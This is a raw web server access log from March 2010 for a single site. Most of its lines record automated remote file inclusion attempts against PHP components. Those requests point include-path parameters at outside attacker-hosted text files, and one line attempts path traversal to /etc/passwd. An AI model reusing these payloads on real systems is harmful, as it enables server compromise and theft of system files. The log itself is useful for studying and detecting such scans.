58.150.99.144 - - [05/Mar/2010:05:54:00 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:05:54:17 -0800] "GET /logs/access_100128.log///bbs/write_update.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:05:54:28 -0800] "GET /logs/access_100224.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [05/Mar/2010:05:54:53 -0800] "GET /logs/access_100224.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute.path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:05:55:03 -0800] "GET /logs/access_100224.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:05:55:16 -0800] "GET /logs/access_100224.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:05:55:19 -0800] "GET /logs///include/mail.inc.=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:05:55:19 -0800] "GET //include/mail.inc.=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:05:55:24 -0800] "GET /logs/access_100202.log%20%20///include/mail.inc.=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.244 - - [05/Mar/2010:05:55:30 -0800] "GET /logs/access_100224.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [05/Mar/2010:05:55:45 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [05/Mar/2010:05:55:46 -0800] "GET /logs/access_100205.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:05:56:04 -0800] "GET /logs///include/mail.inc.=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:05:56:04 -0800] "GET /logs/access_100202.log%20%20///include/mail.inc.=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:05:56:06 -0800] "GET //include/mail.inc.=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:05:56:16 -0800] "GET //include/mail.inc.=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:05:56:17 -0800] "GET /logs/access_100202.log%20%20///include/mail.inc.=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:05:56:20 -0800] "GET /logs///include/mail.inc.=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [05/Mar/2010:05:56:39 -0800] "GET /logs/access_100220.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.250.255.242 - - [05/Mar/2010:05:57:13 -0800] "GET /login/register.php HTTP/1.1" 200 4989 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.puaga.com"
220.232.237.122 - - [05/Mar/2010:05:57:55 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [05/Mar/2010:05:57:55 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [05/Mar/2010:05:57:55 -0800] "GET /logs/access_100208.log%20%20//modules/xfsection/modify.php?dir_module=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.232.237.122 - - [05/Mar/2010:05:58:01 -0800] "GET /logs/access_100204.log%20%20//modules/xfsection/modify.php?dir_module=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:05:59:18 -0800] "GET /logs/access_100224.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [05/Mar/2010:06:00:44 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [05/Mar/2010:06:00:44 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [05/Mar/2010:06:00:44 -0800] "GET /logs/access_100217.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [05/Mar/2010:06:01:03 -0800] "GET /logs/access_100225.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:06:01:25 -0800] "GET /logs/access_100214.log///bbs/write_update.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [05/Mar/2010:06:01:43 -0800] "GET /logs/?INCLUDE_FOLDER=http://zstef.interfree.it/id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [05/Mar/2010:06:01:43 -0800] "GET /logs/access_100215.log%20%20/?INCLUDE_FOLDER=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [05/Mar/2010:06:01:44 -0800] "GET /?INCLUDE_FOLDER=http://zstef.interfree.it/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [05/Mar/2010:06:02:27 -0800] "GET /logs/home.php?info.phphttp://www.zahirajans.com/v22/cache/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
62.140.23.24 - - [05/Mar/2010:06:02:27 -0800] "GET /home.php?info.phphttp://www.zahirajans.com/v22/cache/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:06:03:01 -0800] "GET /logs/access_100226.log//?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:06:04:04 -0800] "GET /logs//board//include/mail.inc.php?=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:06:04:04 -0800] "GET /logs/access_100202.log%20%20//board//include/mail.inc.php?=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:06:04:04 -0800] "GET /board//include/mail.inc.php?=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:06:04:17 -0800] "GET /logs/access_100209.log%20%20//board//include/mail.inc.php?=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:06:04:22 -0800] "GET /admin/auth.php?xcart_dir=http://www.akarin.de/baner.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:06:04:22 -0800] "GET /logs/access_100128.log//admin/auth.php?xcart_dir=http://www.akarin.de/baner.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:06:04:22 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.akarin.de/baner.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:06:04:45 -0800] "GET /phphtml.php?htmlclass_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:06:04:56 -0800] "GET /logs//board//include/mail.inc.php?=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:06:04:56 -0800] "GET /board//include/mail.inc.php?=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:06:04:56 -0800] "GET /logs/access_100202.log%20%20//board//include/mail.inc.php?=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:06:05:04 -0800] "GET /admin/auth.php?xcart_dir=http://www.akarin.de/baner.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:06:05:04 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.akarin.de/baner.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:06:05:04 -0800] "GET /logs/access_100128.log%20%20//admin/auth.php?xcart_dir=http://www.akarin.de/baner.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:06:05:07 -0800] "GET /logs/access_100209.log%20%20//board//include/mail.inc.php?=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:06:05:16 -0800] "GET /logs/access_100207.log//admin/auth.php?xcart_dir=http://www.akarin.de/baner.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:06:05:32 -0800] "GET /logs//com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:06:05:32 -0800] "GET /com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:06:05:32 -0800] "GET /logs/access_100226.log%20%20//com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:06:05:42 -0800] "GET /logs/access_100226.log%20%20//com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:06:05:42 -0800] "GET /com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:06:05:42 -0800] "GET /logs//com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.221.86.134 - - [05/Mar/2010:06:05:51 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.akarin.de/baner.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.221.86.134 - - [05/Mar/2010:06:05:52 -0800] "GET /admin/auth.php?xcart_dir=http://www.akarin.de/baner.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.221.86.134 - - [05/Mar/2010:06:05:53 -0800] "GET /logs/access_100128.log//admin/auth.php?xcart_dir=http://www.akarin.de/baner.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.221.86.134 - - [05/Mar/2010:06:05:54 -0800] "GET /logs/access_100128.log//admin/auth.php?xcart_dir=http://www.akarin.de/baner.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.221.86.134 - - [05/Mar/2010:06:05:54 -0800] "GET /admin/auth.php?xcart_dir=http://www.akarin.de/baner.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:06:05:55 -0800] "GET /com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:06:05:55 -0800] "GET /logs//com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:06:05:55 -0800] "GET /logs/access_100226.log%20%20//com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.221.86.134 - - [05/Mar/2010:06:05:55 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.akarin.de/baner.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.204.38.42 - - [05/Mar/2010:06:06:07 -0800] "GET /logs/access_100207.log%20%20//admin/auth.php?xcart_dir=http://www.akarin.de/baner.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [05/Mar/2010:06:06:23 -0800] "GET /logs/access_100219.log%20%20/?INCLUDE_FOLDER=http://zstef.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:06:06:30 -0800] "GET /logs/phphtml.php?htmlclass_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:06:06:30 -0800] "GET /phphtml.php?htmlclass_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:06:06:31 -0800] "GET /logs/access_100207.log%20%20/phphtml.php?htmlclass_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [05/Mar/2010:06:06:49 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [05/Mar/2010:06:06:49 -0800] "GET /logs/access_100128.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:06:06:50 -0800] "GET /logs/access_100202.log//board//include/mail.inc.php?=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [05/Mar/2010:06:06:58 -0800] "GET /logs/access_100129.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.221.86.134 - - [05/Mar/2010:06:07:08 -0800] "GET /logs/access_100207.log//admin/auth.php?xcart_dir=http://www.akarin.de/baner.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [05/Mar/2010:06:07:43 -0800] "GET /logs/access_100202.log//board//include/mail.inc.php?=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [05/Mar/2010:06:07:51 -0800] "GET /download.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [05/Mar/2010:06:07:51 -0800] "GET /logs//download.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [05/Mar/2010:06:07:52 -0800] "GET /logs/access_100219.log//download.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:06:07:57 -0800] "GET /logs/phphtml.php?htmlclass_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:06:07:57 -0800] "GET /logs/access_100207.log%20%20/phphtml.php?htmlclass_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [05/Mar/2010:06:08:04 -0800] "GET /logs/access_100225.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [05/Mar/2010:06:08:04 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [05/Mar/2010:06:08:07 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [05/Mar/2010:06:08:07 -0800] "GET /logs/access_100217.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://h1.ripway.com/pottlot/by1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:06:08:13 -0800] "GET /logs/access_100209.log%20%20///include/mail.inc.=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
189.108.236.148 - - [05/Mar/2010:06:08:27 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.someday-store.com/shop/images/uploads/.../.../id?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
189.108.236.148 - - [05/Mar/2010:06:08:29 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
211.95.78.56 - - [05/Mar/2010:06:09:01 -0800] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [05/Mar/2010:06:09:01 -0800] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [05/Mar/2010:06:09:01 -0800] "GET /logs/access_100128.log%20%20//accounts/inc/include.php?language=0&lang_settings[0][1]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:06:09:04 -0800] "GET /phphtml.php?htmlclass_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:06:09:04 -0800] "GET /logs/phphtml.php?htmlclass_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [05/Mar/2010:06:09:04 -0800] "GET /logs/access_100207.log%20%20/phphtml.php?htmlclass_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:06:09:05 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:06:09:05 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:06:09:05 -0800] "GET /logs/access_100210.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.221.86.134 - - [05/Mar/2010:06:09:29 -0800] "GET /logs//admin/auth.php?xcart_dir=http://www.akarin.de/baner.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.221.86.134 - - [05/Mar/2010:06:09:29 -0800] "GET /admin/auth.php?xcart_dir=http://www.akarin.de/baner.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.112.232 - - [05/Mar/2010:06:09:34 -0800] "GET /logs/access_100227.log HTTP/1.0" 200 1479431 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
41.221.86.134 - - [05/Mar/2010:06:09:36 -0800] "GET /logs/access_100128.log%20%20//admin/auth.php?xcart_dir=http://www.akarin.de/baner.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [05/Mar/2010:06:09:42 -0800] "GET /logs/access_100203.log%20%20//////write_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [05/Mar/2010:06:09:42 -0800] "GET /////write_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [05/Mar/2010:06:09:42 -0800] "GET /logs//////write_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:06:09:44 -0800] "GET /logs/access_100205.log%20%20//com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:06:09:47 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:06:09:47 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:06:09:47 -0800] "GET /logs/access_100210.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:06:09:50 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:06:09:50 -0800] "GET /logs/access_100210.log%20%20//modules/My_eGallery/public/displayCategory.php?basepath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:06:09:50 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:06:09:51 -0800] "GET /logs/access_100205.log%20%20//com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [05/Mar/2010:06:09:55 -0800] "GET /logs/access_100206.log%20%20//////write_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [05/Mar/2010:06:10:12 -0800] "GET /logs/access_100205.log%20%20//com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:06:10:16 -0800] "GET /logs/access_100201.log//?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [05/Mar/2010:06:10:21 -0800] "GET /logs/access_100201.log//?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.221.86.134 - - [05/Mar/2010:06:10:29 -0800] "GET /logs/access_100207.log%20%20//admin/auth.php?xcart_dir=http://www.akarin.de/baner.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
